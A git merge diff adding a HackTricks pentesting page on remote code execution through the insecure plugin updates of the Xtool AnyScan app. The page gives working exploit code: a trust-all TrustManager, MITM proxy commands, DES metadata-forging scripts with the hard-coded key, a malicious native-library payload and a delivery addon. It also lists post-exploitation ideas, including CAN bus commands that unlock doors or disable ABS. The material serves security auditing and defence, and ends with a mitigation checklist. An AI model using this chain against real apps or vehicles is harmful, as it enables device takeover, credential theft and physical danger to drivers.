Merge pull request #1145 from HackTricks-wiki/update_Remote_Code_Execution_Discovered_in_Xtool_AnyScan__20250717_124256

Remote Code Execution Discovered in Xtool AnyScan App — Risk...

Author: carlospolop

src/SUMMARY.md

@@ -334,6 +334,7 @@
     - [Frida Tutorial 3](mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md)
     - [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
   - [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
+  - [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
   - [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
   - [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)
   - [Make APK Accept CA Certificate](mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md)

src/mobile-pentesting/android-app-pentesting/README.md

@@ -26,6 +26,7 @@ Sometimes it is interesting to **modify the application code** to access **hidde
 
 - [Spoofing your ___location in Play Store](spoofing-your-___location-in-play-store.md)
 - [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md)
+- [Exploiting Insecure In-App Update Mechanisms](insecure-in-app-update-rce.md)
 - **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
 - Extract APK from device:
 

src/mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md

@@ -0,0 +1,135 @@
+# Insecure In-App Update Mechanisms – Remote Code Execution via Malicious Plugins
+
+{{#include ../../banners/hacktricks-training.md}}
+
+Many Android applications implement their **own “plugin” or “dynamic feature” update channels** instead of using the Google Play Store.  When the implementation is insecure an attacker able to intercept the traffic can supply **arbitrary native code that will be loaded inside the app process**, leading to full Remote Code Execution (RCE) on the handset – and in some cases on any external device controlled by the app (cars, IoT, medical devices …).
+
+This page summarises a real‐world vulnerability chain found in the Xtool **AnyScan** automotive-diagnostics app (v4.40.11 → 4.40.40) and generalises the technique so you can audit other Android apps and weaponise the mis-configuration during a red-team engagement.
+
+---
+## 1. Identifying an Insecure TLS TrustManager
+
+1. Decompile the APK with jadx / apktool and locate the networking stack (OkHttp, HttpUrlConnection, Retrofit…).
+2. Look for a **custom `TrustManager`** or `HostnameVerifier` that blindly trusts every certificate:
+
+```java
+public static TrustManager[] buildTrustManagers() {
+    return new TrustManager[]{
+        new X509TrustManager() {
+            public void checkClientTrusted(X509Certificate[] chain, String authType) {}
+            public void checkServerTrusted(X509Certificate[] chain, String authType) {}
+            public X509Certificate[] getAcceptedIssuers() {return new X509Certificate[]{};}
+        }
+    };
+}
+```
+
+3. If present the application will accept **any TLS certificate** → you can run a transparent **MITM proxy** with a self-signed cert:
+
+```bash
+mitmproxy -p 8080 -s addon.py  # see §4
+iptables -t nat -A OUTPUT -p tcp --dport 443 -j REDIRECT --to-ports 8080  # on rooted device / emulator
+```
+
+## 2. Reverse-Engineering the Update Metadata
+
+In the AnyScan case each app launch triggers an HTTPS GET to:
+```
+https://apigw.xtoolconnect.com/uhdsvc/UpgradeService.asmx/GetUpdateListEx
+```
+The response body is an **XML document** whose `<FileData>` nodes contain **Base64-encoded, DES-ECB encrypted** JSON describing every available plugin.
+
+Typical hunting steps:
+1. Locate the crypto routine (e.g. `RemoteServiceProxy`) and recover:
+   * algorithm (DES / AES / RC4 …)
+   * mode of operation (ECB / CBC / GCM …)
+   * hard-coded key / IV (often 56-bit DES keys or 128-bit AES keys in constants)
+2. Re-implement the function in Python to decrypt / encrypt the metadata:
+
+```python
+from Crypto.Cipher import DES
+from base64 import b64decode, b64encode
+
+KEY = IV = b"\x2A\x10\x2A\x10\x2A\x10\x2A"  # 56-bit key observed in AnyScan
+
+def decrypt_metadata(data_b64: str) -> bytes:
+    cipher = DES.new(KEY, DES.MODE_ECB)
+    return cipher.decrypt(b64decode(data_b64))
+
+def encrypt_metadata(plaintext: bytes) -> str:
+    cipher = DES.new(KEY, DES.MODE_ECB)
+    return b64encode(cipher.encrypt(plaintext.ljust((len(plaintext)+7)//8*8, b"\x00"))).decode()
+```
+
+## 3. Craft a Malicious Plugin
+
+1. Pick any legitimate plugin ZIP and replace the native library with your payload:
+
+```c
+// libscan_x64.so – constructor runs as soon as the library is loaded
+__attribute__((constructor))
+void init(void){
+    __android_log_print(ANDROID_LOG_INFO, "PWNED", "Exploit loaded! uid=%d", getuid());
+    // spawn reverse shell, drop file, etc.
+}
+```
+
+```bash
+$ aarch64-linux-android-gcc -shared -fPIC payload.c -o libscan_x64.so
+$ zip -r PWNED.zip libscan_x64.so assets/ meta.txt
+```
+
+2. Update the JSON metadata so that `"FileName" : "PWNED.zip"` and `"DownloadURL"` points to your HTTP server.
+3. DES-encrypt + Base64-encode the modified JSON and copy it back inside the intercepted XML.
+
+## 4. Deliver the Payload with mitmproxy
+
+`addon.py` example that *silently* swaps the original metadata:
+
+```python
+from mitmproxy import http
+MOD_XML = open("fake_metadata.xml", "rb").read()
+
+def request(flow: http.HTTPFlow):
+    if b"/UpgradeService.asmx/GetUpdateListEx" in flow.request.path:
+        flow.response = http.Response.make(
+            200,
+            MOD_XML,
+            {"Content-Type": "text/xml"}
+        )
+```
+
+Run a simple web server to host the malicious ZIP:
+```bash
+python3 -m http.server 8000 --directory ./payloads
+```
+
+When the victim launches the app it will:
+* fetch our forged XML over the MITM channel;
+* decrypt & parse it with the hard-coded DES key;
+* download `PWNED.zip` → unzip inside private storage;
+* `dlopen()` the included *libscan_x64.so*, instantly executing our code **with the app’s permissions** (camera, GPS, Bluetooth, filesystem, …).
+
+Because the plugin is cached on disk the backdoor **persists across reboots** and runs every time the user selects the related feature.
+
+## 5. Post-Exploitation Ideas
+
+* Steal session cookies, OAuth tokens, or JWTs stored by the app.
+* Drop a second-stage APK and silently install it via `pm install` (the app already has `REQUEST_INSTALL_PACKAGES`).
+* Abuse any connected hardware – in the AnyScan scenario you can send arbitrary **OBD-II / CAN bus commands** (unlock doors, disable ABS, etc.).
+
+---
+### Detection & Mitigation Checklist (blue team)
+
+* NEVER ship a production build with a custom TrustManager/HostnameVerifier that disables certificate validation.
+* Do not download executable code from outside Google Play. If you *must*, sign each plugin with the same **apkSigning v2** key and verify the signature before loading.
+* Replace weak/hard-coded crypto with **AES-GCM** and a server-side rotating key.
+* Validate the integrity of downloaded archives (signature or at least SHA-256).
+
+---
+## References
+
+- [NowSecure – Remote Code Execution Discovered in Xtool AnyScan App](https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/)
+- [Android – Unsafe TrustManager patterns](https://developer.android.com/privacy-and-security/risks/unsafe-trustmanager)
+
+{{#include ../../banners/hacktricks-training.md}}